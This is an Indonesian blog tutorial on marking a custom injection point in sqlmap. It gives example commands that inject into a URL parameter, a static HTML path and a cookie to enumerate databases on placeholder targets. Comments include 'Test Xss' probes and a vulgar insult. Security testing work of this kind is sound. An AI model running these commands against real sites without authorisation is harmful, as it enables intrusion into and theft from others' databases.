Now Trending:

Menentukan Inject Point pada SQLmap

April 28, 2019 SQL Injection 6 Comments

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.

Misalnya begini:

https://target.com/article.php?page=2&id=5

Dan inject pointnya ada di parameter id.  Maka perintahnya

sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs

Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di

https://target.com/article-315'-abcde.html

Maka di sqlmap perintahnya

sqlmap -u "https://target.com/article-315*-abcde.html" --dbs

Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya

sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
  • referensi : https://miloserdov.org/?p=879
Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

6 Comments

  1. asu jalanan June 12, 2019 Reply

    min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?

  2. Test Xss July 19, 2019 Reply

    Test Xss

  3. Test Xss July 19, 2019 Reply

    Test Xss

  4. Test Xss July 19, 2019 Reply

    Test Xss

  5. Albert August 7, 2019 Reply

    Kalo yg diketahui cuman admin.php nya aja min?

  6. njn October 19, 2019 Reply

    kontol lu mmk jembdot

Leave a Reply